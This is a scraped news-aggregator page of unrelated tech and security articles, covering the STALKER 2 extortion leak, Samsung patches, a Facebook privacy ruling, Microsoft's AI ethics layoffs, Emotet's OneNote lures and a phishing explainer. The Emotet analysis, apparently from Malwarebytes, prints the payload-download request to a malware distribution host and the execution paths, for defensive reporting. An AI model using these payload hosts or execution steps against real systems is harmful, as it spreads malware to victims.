Hackers threaten to leak STALKER 2 assets if devs don’t heed demands

andreasc
-
0
Hackers threaten to leak STALKER 2 assets if devs don’t heed demands
[ad_1]

The developers of first-person shooter game, STALKER 2, have revealed assets related to the game were stolen and used for blackmail and intimidation.

Ukrainian game developer GSC Game World has announced it was breached by Russian hacktivists who stole assets related to the much-awaited game STALKER 2: Heart of Chernobyl. 

According to GSC, the hacktivists accessed an employee’s image app account and stole STALKER 2’s full story, cut scenes, various concept art, global maps, and more. The company said these assets are being used for blackmail and intimidation.

“We have been enduring constant cyberattacks for more than a year now,” the GCS Game World Team said in its.

“We have faced blackmail, acts of aggression, attempts to hurt players and fans, and efforts to damage the development process of the reputation of our company.”

A group named Vestnik TSS has claimed responsibility and has given the devs an ultimatum: Do as we say, or we’ll leak all stolen STALKER 2 assets.

“Nick Frost”, a Vestnik TSS administrator, posted the group’s demands on the Russian social media site VK.com. Below is a screenshot of the English-translated post:

Vestnik TSS wants GSC to apologize to players in Russia and Belarus for its perceived “unworthy attitude” towards them, un-ban certain Russian accounts on its official Discord server, and bring back the Russian localization of STALKER 2. The group gave the developers until March 15, Wednesday, to make these changes.

It appears, however, that Vestnik TSS leaked some files that they stole before yesterday’s deadline. The group’s VK page is awash with concept art, which includes an overview of mutant NPCs, bits of the game world’s map, and artifacts. On Tuesday, alias “Daniel Nexus”, likely another admin, posted more STALKER 2 assets archived and kept behind a password.

GSC Game World is yet to respond to the demands; and by the tone of its message, I suspect the developers have no intention of complying. Instead, the team has pleaded for the STALKER community to refrain from watching or distributing the leaked materials.

“Outdated and work-in-progress materials may dilute the impression of the final idea that we have put into the game. We encourage you to stay patient and wait for the official release for the best experience possible. We believe that you will love it.”

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW


[ad_2]
Source link

March update live for all recent Samsung foldables in the US

andreasc
-
0
March update live for all recent Samsung foldables in the US
[ad_1]

Samsung is updating pretty much all of its foldable smartphones to the March 2023 Android security patch in the US. The latest security update is rolling out to the Galaxy Z Fold 4, Galaxy Z Fold 3, Galaxy Z Flip 4, Galaxy Z Flip3, Galaxy Z Flip 5G, and Galaxy Z Flip. The first-gen Galaxy Fold and the Galaxy Z Fold 2 are the only models still missing the March SMR (Security Maintenance Release) stateside.

The March security update is available for both carrier-locked and unlocked units of the Galaxy Z Fold 4 in the US. The update comes with firmware versions F936USQS2CWB1 and F936U1UES2CWB1 for the two variants, respectively. It is rolling out widely on all major networks. As you can see in the official changelog here, Samsung isn’t pushing any new features or user-facing changes to the foldable. The latest firmware release is all about this month’s security patch.

The same goes for the Galaxy Z Flip 4 as well. The March update for the latest clamshell foldable is rolling out widely for everyone in the US. The updated firmware versions are F721USQS2CWB1 (carrier-locked) and F721U1UES2CWB1 (unlocked). Once again, Samsung’s changelog doesn’t mention anything apart from the latest security patch, which contains more than 60 vulnerability fixes.

The story is slightly different for the Galaxy Z Fold 3 and Galaxy Z Flip 3. As of this writing, Samsung is only pushing the March SMR to the unlocked variants of its 2021 foldable duo in the US. The new firmware build number for the former is F926U1UES2FWB3, while that for the latter is F711U1UES3FWB3. The update is live for users on pretty much every wireless network stateside. There are no new features in tow here as well.

Galaxy Z Flip & Flip 5G are also getting the March update in the US

Samsung is also pushing the March SMR to the original Galaxy Z Flip and its 5G model in the US. As of this writing, the update is only available for the unlocked variants. The new firmware build numbers for the two models are F700U1TBS5IWC2 and F707U1UES3HWC1, respectively. Users with a carrier-locked Galaxy Z Flip, Galaxy Z Flip 5G, Galaxy Z Fold 3, and Galaxy Z Flip 3 in the US should get the latest security update in the coming days.

As said earlier, the March SMR patches more than 60 vulnerabilities in Galaxy devices. These include at least five critical Android OS patches from Google. Samsung will push the latest security update to more eligible Galaxy devices in the coming days. As usual, you can check for updates from the Software update menu in the Settings app. Your phone may also notify you about new updates.


[ad_2]
Source link

Next fastest charging smartphone coming in Q3 2023, here are the details

andreasc
-
0
Next fastest charging smartphone coming in Q3 2023, here are the details
[ad_1]

The Realme GT3 launched at the end of last month, and it became the world’s fastest charging smartphone. Well, it seems like the next fastest charging smartphone is coming in Q3 this year, and we have the details.

Before we get down to it, let’s just say that the Realme GT3 supports 240W wired charging. Redmi announced 300W charging around the same time, but we don’t know when we can expect a device to actually support it.

The next fastest charging smartphone is coming from Infinix, and will launch in Q3

The phone we’re talking about here is the Infinix GT 10 Pro. That device will utilize the company’s 260W wired charging that was announced recently. The company also announced 110W wireless charging, but we’re not sure if it will support that as well.

The details about this phone have been revealed by Paras Guglani, who partnered up with MySmartPrice. This phone will include a 5,000mAh battery, which will be rechargeable with such insanely fast charging.

The phone will be fueled by the MediaTek Dimensity 9000 SoC. It will also include a 120Hz AMOLED display, which will be curved, and measure 6.8 inches. A 200-megapixel camera was also mentioned by the tipster.

It will ship with Android 13, and include 12GB of RAM

You’ll get 12GB of RAM inside of this phone, along with 256GB of storage. Android 13 will come pre-installed on the device. The Infinix GT 10 Pro will arrive in two color options, but we don’t know what they are just yet.

That’s basically everything the tipster shared thus far. It’s obvious that this will be a well-specced phone, but its main appeal will definitely be 260W charging. We do hope that Infinix will also include 110W wireless charging that it announced. The rest of its specifications are also nothing to scoff at, quite the contrary.


[ad_2]
Source link

Facebook illegally processed user data, says court

andreasc
-
0
Facebook illegally processed user data, says court
[ad_1]

Two European privacy watchdogs have won cases against Meta. The rulings may have serious consequences for European website owners.

The Amsterdam court has ruled that Facebook illegally processed user data in a case started by the Dutch Data Privacy Stichting (DPS), a foundation that acts on behalf of victims of privacy violations in the Netherlands.

According to the ruling, Facebook used personal data for advertising purposes in the period April 1, 2010, to January 1, 2020, when this was not allowed. The same ruling also says that Facebook shared personal data with third parties without any legal basis to do so, and without informing the users themselves. Without properly informing users there can be no consent.

The DPS and the Dutch Consumentenbond—a consumers association with over 400,000 members—filed a class-action suit against Facebook Ireland, which is the European subsidiary of Meta that oversees the processing of Dutch user data. This ruling doesn’t mean damages can yet be claimed by the 185,000+ people that are represented in the class-action suit, but it’s one step closer. Based on this ruling, the group now hopes to sit down with Facebook to negotiate a settlement. Any of the roughly 10 million Dutch people who used Facebook during the relevant period can join if the case moves to a damages phase.

The main complaints were that Facebook used personal data for advertising and shared data like sexual preferences and religion with third parties. The data in question were both provided by the users themselves and derived by Facebook from the users’ browsing behavior outside of Facebook itself. Facebook not only shared users’ personal data with third parties but also the personal data of their Facebook friends.

Facebook was cleared of the complaint that it placed cookies on third party websites. The court ruled that it transferred the responsibility for those cookies to the website owners, and had the right to do so. Facebook was also cleared of enrichment charges as the court found not enough proof that Facebook’s monetary gain from these actions resulted in direct damages to the users.

A spokesperson for Meta said the company was “pleased” with parts of the decision but would appeal others, noting that some of the claims date back more than a decade.

Austria

In Austria, the Datenschutzbehörde (DSB) ruled that a complaint that Meta’s tracking pixels by the privacy organization noyb were conflicting with European GDPR rules was partially upheld. The website owner was found in conflict with GDPR regulations because personal data of users (at least unique user identification numbers, IP address and browser parameters) were transferred to the USA in a data transfer without ensuring an adequate level of protection.

Last year the Austrian privacy watchdog ruled against Google Analytics as being in conflict with GDPR regulations. According to noyb, the same rules apply to Facebook Login and Meta Pixel because these tools also send data to the US.

Together these rulings may have serious consequences for all European based website owners. Because of the transferred responsibility the website owners take on by using these tools, they can be held liable for the fact that Meta and Google send data to the US without ensuring an adequate level of protection.

Malwarebytes removes all remnants of ransomware and prevents you from getting reinfected. Want to learn more about how we can help protect your business? Get a free trial below.

TRY NOW


[ad_2]
Source link

Galaxy S23, Galaxy S20 & A53 5G get March update in the US

andreasc
-
0
Galaxy S23, Galaxy S20 & A53 5G get March update in the US
[ad_1]

Samsung‘s March update is available for more Galaxy devices in the US. The Galaxy S23 series, Galaxy S20 series, and the Galaxy A53 5G are picking up the latest security patch stateside. They join the Galaxy S22, Galaxy S21, Galaxy Note 20, and all recent Galaxy Z series foldables in the party.

The March SMR (Security Maintenance Release) for the Galaxy S23, Galaxy S23+, and Galaxy S23 Ultra is available widely for both carrier-locked and unlocked variants in the US. The updated firmware build number for the former is S91*USQS1AWBM while that for the latter is S91*U1UES1AWBM. Samsung doesn’t seem to be pushing any new features to the devices with this release. That isn’t surprising, though. The handsets have just arrived on the market. You can expect feature updates for the phones in the coming months.

Likewise, the Galaxy S20, Galaxy S20+, and Galaxy S20 Ultra are fresh from the One UI 5.1 update and are only getting the latest security update today. As of this writing, Samsung is pushing the March SMR to the factory-unlocked variants of its 2020 flagships in the US. The new firmware version for the phones is G98*U1UES3HWB5. Carrier-locked units should follow in the coming days. The update for the unlocked units is rolling out widely on most wireless networks stateside, including AT&T, T-Mobile, and Verizon.

This month’s security update is also available for the Galaxy A53 5G in the US. The rollout began recently for carrier-locked models. The handset is getting the update with the firmware build number A536USQS4CWC2. Users with an unlocked unit of the 2022 premium mid-ranger can expect to receive this software release in the coming days. Don’t expect any new features, though. Like the Galaxy S20 series, your phone also recently picked up the One UI 5.1 update with a host of goodies. The latest release is all about vulnerability fixes.

March update for Galaxy devices contains several dozen security patches

Samsung has been rolling out the March update for its Galaxy smartphones and tablets since early last week. It has already pushed the new SMR to most of its recent flagship models and a few mid-rangers. The update contains patches for more than 60 vulnerabilities that affect various system components across the Galaxy lineup. About 20 of those are Galaxy-specific vulnerabilities while the remaining flaws affect the entire Android ecosystem. You can go to Settings > Software update on your Galaxy smartphone and tap on Download and install to check for new updates.


[ad_2]
Source link

Microsoft laid off an AI ethics team

andreasc
-
0
Microsoft laid off an AI ethics team
[ad_1]

According to Arstechnica (via Platformer), Microsoft has just axed an AI ethics team following the mass layoffs within the company that affected 10,000 employees. The team was responsible for monitoring and reducing the social harms caused by Microsoft AI products.

Microsoft has been making the headlines in recent months for its initial investment in ChatGPT parent company OpenAI and integrating it into its Bing search engine. While all companies that incorporate AI into their products and services have a team to examine the possible associated dangers, Microsoft just laid off its AI ethics team members.

The team reportedly developed a “responsible innovation toolkit” for Microsoft that helped the company’s engineers to predict and eliminate the risks generated by the AI. Former team members say they had a key role in mitigating AI risks in Microsoft products.

Microsoft AI ethics team left the company following recent layoffs

In response to the news, Microsoft announced it remains “committed to developing AI products and experiences safely and responsibly, and does so by investing in people, processes, and partnerships that prioritize this.”

The company also says it has focused on building its Office of Responsible AI in the past six years. This team remains in place and works with the Aether Committee and Responsible AI Strategy in Engineering to mitigate AI risks.

Microsoft’s decision to lay off an AI ethics team coincides with the launch of OpenAI’s most advanced AI model, GPT-4. This model is added to Microsoft Bing, which can stoke even more interest in Google’s rival.

Microsoft started forming its AI ethics team in 2017, and the team reportedly had 30 members. The Platformer reports that the company later scattered the members into different departments as AI competition with Google was heating up. Finally, Microsoft downsized the team to only seven people.

The former employees also claim Microsoft didn’t listen to their recommendations for AI-driven tools like Bing Image Creator that copied artists’ work. The axed employees are now concerned about the possible dangers that AI can expose to users when there’s no one in the company to say “no” to the potentially irresponsible designs.


[ad_2]
Source link

Emotet adopts Microsoft OneNote attachments

andreasc
-
0
Emotet adopts Microsoft OneNote attachments
[ad_1]

Emotet finally got the memo and added Microsoft OneNote lures.

Last week, Emotet returned after a three month absence when the botnet Epoch 4 started sending out malicious emails with malicious Office macros. While the extracted attachments were inflated to several hundred megabytes, it was surprising to see that Emotet persisted in using the same attack format.

Indeed, Microsoft has been rolling out its initiative of auto-blocking macros from downloaded documents since last summer. This has forced criminals to revisit how they want to deliver malware via malspam. One noticeable change was the use of Microsoft OneNote documents by several other criminal gangs. Now, it is Emotet’s turn to follow along.

The OneNote file is simple but yet effective at social engineering users with a fake notification stating that the document is protected. When instructed to double-click on the View button, victims will inadvertently double-click on an embedded script file instead.

This triggers Windows scripting engine (wscript.exe) to execute the following command:

%Temp%\OneNote\16.0\NT\0\click.wsf"

The heavily obfuscated script retrieves the Emotet binary payload from a remote site

GET https://penshorn[.]org/admin/Ses8712iGR8du/ HTTP/1.1
Connection: Keep-Alive
Accept: */*
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: penshorn.org

The file is saved as a DLL and executed via regsvr32.exe:

%Temp%\OneNote\16.0\NT\0\rad44657.tmp.dll"

Once installed on the system, Emotet will then communicate with its command and control servers to receive further instructions.

As Emotet ramps up its malspam distribution, users should be particularly careful of this threat which we featured in our 2023 State of Malware Report, as it serves as an entry point for other threat actors keen on dropping ransomware.

Malwarebytes customers are protected against this threat at several layers within its attack chain including web protection, malware blocking. Our EDR product also flags the whole sequence:

Although Emotet has had vacations, retirements and even been taken down by authorities before, it continues to be a serious threat and highlights how social engineering attacks are so effective. While macros may soon be a thing of the past, we can see that threat actors can leverage a variety of popular business applications to achieve their end goal of gaining a foothold onto enterprise networks.

We will continue to monitor any new developments with Emotet to ensure our customers remain protected.

Have a burning question or want to learn more about our cyberprotection? Get a free business trial below.

GET STARTED


[ad_2]
Source link

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro

andreasc
-
0
Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro
[ad_1]

This time around, we’re here to compare the best of Samsung and Huawei, at the moment. In other words, we’ll compare the Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro. Both of these are big and bold flagship smartphone offerings from the two companies. They are quite different, though, in many ways. They do look different, and feel entirely different in the hand. Their internals differ quite a bit, and even their software.

We’ll first list their specifications, and will then move to compare them across a number of categories. We’ll compare their designs, display, performance, battery life, cameras, and audio performance, as per usual. Before we get started, do note that the Mate 50 Pro comes without Google services, it includes Huawei services. That being said, let’s get going, shall we?

Specs

Samsung Galaxy S23 UltraHuawei Mate 50 Pro
Screen size6.8-inch QHD+ Dynamic AMOLED 2X display (curved, 120Hz adaptive refresh rate, LTPO, down to 1Hz, 1,750 nits peak brightness)6.74-inch QHD+ curved OLED display (120Hz refresh rate)
Screen resolution3080 x 14402616 x 1212
SoCQualcomm Snapdragon 8 Gen 2 for GalaxyQualcomm Snapdragon 8+ Gen 1
RAM8GB/12GB (LPDDR5X)8GB (LPDDR5)
Storage256GB/512GB/1TB, non-expandable (UFS 4.0)256GB/512GB, expandable (UFS 3.1)
Rear cameras200MP (f/1.7 aperture, 24mm lens, 0.6um pixel size, multi-directional PDAF, Laser AF, OIS)
12MP (ultrawide, Dual Pixel AF, 120-degree FoV, f/2.2 aperture, 1.4um pixel size)
10MP (telephoto, Dual Pixel AF, OIS, f/2.4 aperture, 1.12um pixel size, 70mm lens, optical zoom 3x)
10MP (telephoto, Dual Pixel AF, OIS, f/4.9 aperture, 1.22um pixel size, 230mm lens, 10x optical zoom, 100x Space Zoom)		50MP (f/1.4-f/4.0, 24mm lens, wide angle, OIS, PDAF, Laser Autofocus)
13MP (f/2.2 aperture, 13mm lens, 120-degree FoV, ultrawide, PDAF)
64MP (f/3.5 aperture, 90mm lens, OIS, PDAF, 3.5x optical zoom)
Front cameras12MP (f/2.2 aperture, 26mm lens, Dual Pixel PDAF)13MP (ultrawide, f/2.4 aperture, 18mm lens)
ToF 3D (depth/biometrics)
Battery5,000mAh, non-removable, 45W wired charging, 15W Qi wireless charging, 4.5W Wireless PowerShare
Charger not included		4,700mAh, non-removable, 66W wired charging, 50W wireless charging, 5W reverse wireless charging
Charger included
Dimensions163.4 x 78.1 x 8.9mm162.1 x 75.5 x 8.5mm
Weight234 grams205 grams (vegan leather)/209 (glass) grams.
Connectivity5G, LTE, NFC, Bluetooth 5.3, Wi-Fi, USB Type-C4G LTE, NFC, Bluetooth 5.2, Wi-Fi, USB Type-C
SecurityIn-display fingerprint scanner (ultrasonic)In-display fingerprint scanner (optical)
OSAndroid 13
One UI 5.1		Android 12
EMUI 13
Price$1,199.99/$1,299/$1,399/TBA (1TB)€1,299
BuySamsungHuawei

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Design

The moment you lay your eyes on these two phones, you’ll see they’re obviously different. The Galaxy S23 Ultra has sharp corners, and its top and bottom sides are completely flat. The phone is made out of metal and glass. The Huawei Mate 50 Pro, on the other hand, has curved corners, and generally a more curvy design. Its frame is made out of metal, while the phone includes a vegan leather or glass backplate. Do note that we’ve reviewed the model with a vegan leather backplate.

Samsung’s flagship is a bit taller, noticeably wider, and slightly thicker than the Huawei Mate 50 Pro. It is also considerably heavier than both glass and vegan leather Mate 50 Pro models. It weighs 234 grams, while the two aforementioned Mate 50 Pro models weigh 209 and 205 grams, respectively. The vegan leather Mate 50 Pro that we reviewed is a lot less slippery than the Galaxy S23 Ultra, which is not surprising. And yes, you will feel the weight of the Galaxy S23 Ultra in comparison.

The Galaxy S23 Ultra has a centered display camera hole, while the Mate 50 Pro includes a notch up top. Both devices have immensely thin bezels. Their rear camera modules do differ quite a bit. Each of the cameras protrudes straight from the back of the Galaxy S23 Ultra. The Mate 50 Pro has a circular camera island on the back, that includes all of the phone’s cameras and sensors. Both phones scream “premium”, basically. They feel like truly well-built, premium phones, and they both offer an IP68 certification for water and dust resistance.

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Display

The Galaxy S23 Ultra features a 6.8-inch QHD+ (3088 x 1440) Dynamic AMOLED 2X display. That panel is slightly curved, and it offers an adaptive refresh rate of up to 120Hz. It also supports HDR10+ content, and it gets quite bright, actually. This panel goes up to 1,750 nits of peak brightness. The Gorilla Glass Victus 2 can be found on the phone’s front, as it’s protecting the display.

Samsung Galaxy S23 Ultra Review AM AH 09

The Huawei Mate 50 Pro, on the other hand, has a 6.74-inch 2616 x 1212 OLED display. That panel can project up to 1 billion colors, and it offers a 120Hz refresh rate. This is not an LTPO panel, though. The phone’s display has a 19.5:9 aspect ratio, and it is curved. This panel is protected by the Huawei Kunlun Glass, which has proven to be quite tough, even in direct drop tests with the Galaxy S23 Ultra.

Now, the Galaxy S23 Ultra technically has a better display thanks to the fact it offers an adaptive refresh rate, and it gets a bit brighter outdoors. Truth be said, however, the Huawei Mate 50 Pro has an outstanding panel, and the vast majority of people wouldn’t even notice the difference. You will notice it if you’re in direct sunlight, but the Mate 50 Pro gets plenty bright too. On top of that, it offers extremely good protection on the front. Both of these displays are great. They offer vivid colors, great viewing angles, and good touch response too.

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Performance

The Snapdragon 8 Gen 2 for Galaxy fuels the Galaxy S23 Ultra. That is basically a slightly overclocked variant of the Snapdragon 8 Gen 2, one of the best chips on the market. The phone also includes 12GB of LPDDR5X RAM and UFS 4.0 flash storage. The Mate 50 Pro is fueled by the Snapdragon 8+ Gen 1 SoC, while the phone packs in 8GB of LPDDR5 RAM and UFS 3.1 flash storage.

The Galaxy S23 Ultra is technically the more powerful smartphone. It is newer, and it includes more powerful performance-related internals. Therefore, it’s also technically more future-proof. The Huawei Mate 50 Pro is nothing to scoff at, and you probably won’t even notice the difference in sheer power on the performance side of things. The Mate 50 Pro flies through everything you throw at it, just like the Galaxy S23 Ultra. That Snapdragon 8+ Gen 1 is an outstanding chip, with great power consumption.

When it comes to regular, everyday tasks, both phones are extremely snappy. Opening and closing apps, browsing, consuming multimedia, photo and video editing… and much more, they both do a great job at those. The same goes for gaming, both phones can run even the most demanding games. You may notice some differences if you run the most demanding ones, but both phones are more than powerful to push through. We were impressed by the performance on both sides.

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Battery

The Galaxy S23 Ultra features a 5,000mAh battery on the inside. The Huawei Mate 50 Pro utilizes a 4,700mAh battery. Now, the Huawei Mate 50 Pro battery life is not bad, not at all, but the Galaxy S23 Ultra beats out almost every other flagship at the moment. The OnePlus 11 can compete in that regard, but the Galaxy S23 Ultra’s battery life is just insane. We were able to get around 9-10 hours of screen-on-time on the phone, without a problem. The Mate 50 Pro lingered between 7 and 8 hours most of the time.

Do note that these numbers usually don’t include any gaming, but they include pretty much everything else. That goes for image editing, video editing, browsing, multimedia consumption, messaging, social media networks, and so on. Gaming and other processor-intensive tasks will, of course, have a negative impact on the battery life. That also includes sharing a hotspot, in case that wasn’t clear. Your mileage may also vary, as we have different usage habits, use different apps, and then there’s the signal strength, and so on.

When charging is concerned, the Mate 50 Pro blows the Galaxy S23 Ultra out of the water. The Huawei Mate 50 Pro not only comes with a charger in the box, but it supports 66W wired, 50W wireless, and 5W reverse wireless charging. The Galaxy S23 Ultra does not include a charger, while it supports 45W wired, 15W wireless, and 4.5W reverse wireless charging.

Samsung Galaxy S23 Ultra vs Huawei Mate 50 Pro: Cameras

Both of these smartphones offer excellent camera hardware, and excellent camera performance too, but… they do differ quite a bit. The Galaxy S23 Ultra has a 200-megapixel main camera, a 12-megapixel ultrawide unit (120-degree FoV), a 10-megapixel telephoto camera (3x optical zoom), and a 10-megapixel periscope telephoto camera (10x optical zoom, 100x Space Zoom). The Huawei Mate 50 Pro includes a 50-megapixel main camera (f/1.4-f/4.0 aperture), a 13-megapixel ultrawide unit (120-degree FoV), and a 64-megapixel periscope telephoto camera (3.5x optical zoom, 100x digital zoom).

AH Huawei Mate 50 Pro image 35

These two phones have an entirely different approaches to photography. As this is not a full review, we’ll just hit the most important aspects. The Galaxy S23 Ultra does a great job with its main camera. It offers plenty of details, and if you need more, you can always use a full 200MP mode. It does a great job with neon signs, and with HDR, most of the time. The Huawei Mate 50 Pro’s adjustable aperture is not a gimmick, not at all. The phone adapts to the situation, and takes the shot. This is still one of the most consistent smartphone cameras we’ve used. It does a great job in HDR situations, and also in low light.

The ultrawide cameras on both phones are great, and mostly in line with the main unit in terms of color science. The Galaxy S23 Ultra wins the video recording aspect, but not by a lot. It also wins the periscope aspect, but it’s also quite close. We do find the Huawei Mate 50 Pro’s main and ultrawide cameras to be more consistent, as they rarely miss. So… it’s up to you, both are outstanding in the camera department.

Audio

There is a set of stereo speakers on each of these devices. They actually provide really, really good speakers, better than most. The sound is loud, and there’s plenty of detail too. You’ll get some bass out of both smartphones, and there’s no noticeable distortion. We really don’t have much to complain about here.

If you need an audio jack, however, you won’t find it here, on either phone. For wired connections, you’ll need to use the Type-C port, which both of these phones have. For wireless connections, the Galaxy S23 Ultra and Huawei Mate 50 Pro are equipped with Bluetooth 5.3 and 5.2, respectively.


[ad_2]
Source link

The Waze map app now displays EV charging stations

andreasc
-
0
The Waze map app now displays EV charging stations
[ad_1]

Finding EV charging stations is sometimes a bit of a hassle, but the Waze map app is here to save the day. A recent update to this app is adding charging stations to aid users to find the nearest place to charge up if there is a need. Electric vehicle owners will find this new feature on the navigation app quite helpful.

With most regions switching from fuel-driven cars to electric options, there is a need to fit into the entire EV process. This involves understanding the driving range on a full charge and pinpointing charging stations around you. Getting familiar with charging stations in your locality might not be hard, but how about other locations?

It’d be nerve-racking to find all the charging stations in the region you live all by yourself. But having an app that could direct you to nearby charging stations would be great. Waze is now making the search for a charging station while driving less stressful.

Easily locate EV charging stations with the Waze map app

A recent update to the Waze map app brings EV charging stations to the navigation platform. While driving your EV in an area you aren’t familiar with, just pull up your Waze map app and spot the nearest charging station. This will save you the stress of asking for directions and also get you to the station just in time before your EV’s battery runs out.

Since most regions are still gradually adapting to EVs, there might be lots of changes to the location of charging stations. This poses a challenge to locating a charging station on most maps. Waze, for its part, provided a solution to this problem, hence making its new update more reliable for EV owners.

To accurately pinpoint an EV charging station, Waze will rely on local Map Editors from its community. All location data fed to the maps’ platform is constantly reviewed to keep it up to date. So the map will constantly be updated once a new station is set up or taken down in various locations.

Regardless of the route you take, Waze will inform you about nearby charging stations if there are any. This is an impressive feature and will prove helpful to EV owners around the world. Over the coming weeks, the Waze map app update with this feature will roll out to one region after another.


[ad_2]
Source link

What is phishing?

andreasc
-
0
What is phishing?
[ad_1]

Phishing is a social engineering tactic that sees hackers attempt to gain access to personal or confidential information by posing as a legitimate company. In this article, Cyber Security Hub’s editor Olivia Powell explores what phishing attacks are, why malicious actors launch phishing attacks and how companies can protect themselves against them.

For our guide explaining the different types of malware and how this can affect your business, visit Cyber Security Hub’s Ultimate guide to malware.  

Contents

  • Why do hackers launch phishing attacks?
  • Phishing attacks that target individuals
  • Phishing attacks that target companies
  • Phishing attacks and cryptocurrency
  • How to protect against phishing attacks

Why do hackers launch phishing attacks?

Phishing attacks soared in 2022, with international consortium and fraud prevention group the Anti-Phishing Working Group recording a total of 3,394,662 phishing attacks in the first three quarters of 2022. There were 1,025,968 attacks in Q1, growing to 1,270,883 attacks in the third quarter, with each quarter breaking the record as the worst quarter APWG has ever observed.

Ernie Moran, general manager of automated prepaid card fraud protection software Arden at financial protection service Brightwell, believes that 2023 will continue to see a rise in phishing attacks due to more people turning to cyber crime for financial gain.

“The downturn in the economy this year will almost certainly lead to an increase in individuals taking additional risks to commit fraud in 2023, but many financial organizations are still unprepared to identify and take action on a coordinated and targeted fraud attack,” he explains.

“The downturn in the economy this year will almost certainly lead to an increase in individuals taking additional risks to commit fraud” – Ernie Moran, general manager of Arden at Brightwell

This financial gain may be from harvesting personal or banking information from individuals and either using or selling it. It may also be gained via accessing confidential information held by companies. They may do this with the goal of extorting the company, or to sell the stolen information to other bad actors on the dark web.

Malicious actors can use a variety of channels to send phishing attempts including texts, social media messages and emails. They can also use a variety of phishing techniques in order to gain access to this information.

Phishing attacks that target individuals

Malicious actors that use phishing attacks against individuals pose as legitimate companies. This is because victims are more likely to click on a link from a source they believe is trustworthy. These attacks are often used to harvest login credentials, personal data or payment information from victims, which can either be sold to other bad actors on the dark web or used to commit credit card fraud or identity theft.

These phishing scams are supposed to appear legitimate, so they often use channels typically deployed by companies to communicate with their customers, like email. As an example, I recently received an email from hackers attempting to phish me by posing as Apple.

The use of a spoofed ‘no reply’ email address and a reference number also serve to make it look more legitimate.

Malicious actors may also use text-based phishing, known as SMSishing or smishing, to pose as a genuine company.  

Starting in November 2020 in the UK, a number of people reported being targeted by phishing attacks where malicious actors posed as the Royal Mail service, claiming that they needed to pay a fee for a parcel to be delivered. As potential victims are used to receiving updates from delivery services including Royal Mail via text message, this makes the message seem more legitimate. 


Image source: the Royal Mail website

If someone entered their card details onto the site, their payment details were harvested. These details may have been sold on dark web sites dedicated to the trading and unauthorized use of credit card details, known as carding sites.  

With 134 in every 1000 people in the UK becoming a victim of credit card fraud per year, with an annual cost of £8,833.20 (US$10,626.30) per 1000 people, phishing attacks like these are doing significant damage.

Phishing attacks that target companies

Companies and their employees can also be targeted by phishing attacks. These attacks are referred to as spear phishing attacks.

These types of attacks are increasingly common, with the majority (65 percent) of cyber attackers using spear phishing as their primary attack vector, according to cyber security company Phishing Box.

Their aim is to either harvest data belonging to the businesses’ customers, or to access data belonging to the business itself. 

Phishing attacks to harvest customer data

Malicious actors may use spear phishing attacks to harvest large amounts of customer data held by said companies. They may do this to extort companies using the threat of a data leak, to sell the information over the dark web or to data brokers, or to use the data for other nefarious purposes including identity theft.

A phishing attack in August 2022 against communications company Twilio led to 163 companies, each with hundreds of customers of their own, being affected by a data breach directly tied to the attack.

The breach, dubbed Oktapus by researchers, involved a targeted phishing attack against Twilio employees to gain unauthorized access to the company’s servers and its customer data.  

The communications platform disclosed that it identified 163 Twilio customers whose “data was accessed without authorization for a limited period of time”. In addition, 93 users of the two-factor authentication app Authy, which Twilio owns, saw their accounts accessed and additional devices registered by bad actors. Following the breach, Twilio notified all users that had their accounts accessed and has removed all unauthorized devices.

After the attack took place, a number of companies reported that their customer data was compromised during the breach, including messaging app Signal, who reported 1,900 users may have had their phone numbers revealed to hackers, with some users directly targeted.

Food delivery company DoorDash said that a “small percentage of individuals whose data is maintained by DoorDash” had their personal data including name, email address, delivery address and phone number. In addition, a smaller number of customers had their “basic order information and partial payment card information” accessed during this data breach.

In response to the attack, Twilio enforced “a number of additional measures internally to protect against these attacks”, including “hardening security controls at multiple layers”. 

Phishing attacks to harvest company data

Malicious actors may also use spear phishing attacks to harvest data relating to the company itself, for example information used to access the company’s network, source code information or other proprietary data. 

In October 2022, cloud storage company Dropbox had its source code stolen by hackers after its employees were targeted by a phishing attack.

The attack saw a malicious actor pose as code integration and delivery platform CircleCI in order to harvest login credentials and authentication codes from employees.  It was also able to access Dropbox’s account on code repository site GitHub, as CircleCI login information can be used to log in to the site.  

Through the attack, the hacker gained access to some of the code Dropbox stores on the platform, including API keys used by its developers.

Dropbox was alerted to the breach by GitHub after suspicious activity was noticed on its account. The hacker was able to access and copy the code for 130 of Dropbox’s code repositories, although this did not contain any code for its core apps or infrastructure. 


 
Image source: Yancy Min on Unsplash 

Dropbox assured users that the threat actor did not gain access to the contents of any Dropbox accounts, passwords or payment information. Instead, the hacker was able to access a “few thousand names and email addresses belonging to Dropbox employees, current and past customers, sales leads and vendors”. The company said the risk to those who had their information accessed in the breach was “minimal”, but all those affected were contacted.

GitHub itself reported a similar phishing attack in September 2022, involving a malicious actor posing as CircleCI to gain access to various user accounts.

The phishing site used by the hacker relayed time-based-one-time-passwords (TOTP) used for two-factor-authentication codes to the hacker in real time, allowing them to gain access to accounts protected by TOTP two-factor authentication. Accounts protected by hardware security keys were not vulnerable to this attack.

Through the attack, the malicious actor was able to gain access to and download multiple private code repositories. This enabled it to use techniques to preserve its access to the account even in the event that the compromised user or organization changed their password.

Phishing attacks and cryptocurrency

Bad actors launching phishing attacks primarily do so for financial gain, whether this is through the theft of payment or banking information, or by selling information gathered through phishing attacks.

With Bitcoin, Ethereum and Tether having market caps of $330.6bn, $152.6bn and $68.2bn respectively, cryptocurrency traders and wallets can be an attractive target for phishing attacks. So much so that Blockchain data platform Chainanalysis reported that a total of $3.8bn in cryptocurrency was stolen in 2022. 

Phishing attacks against those who own cryptocurrency can have large payouts. In October 2022, a hacker known as Monkey Drainer used phishing attacks to steal $1mn worth of Ethereum and NFTs in just 24 hours

Monkey Drainer is notorious for using phishing-based hacking techniques to steal from victims by setting up fake cryptocurrency and NFT sites.

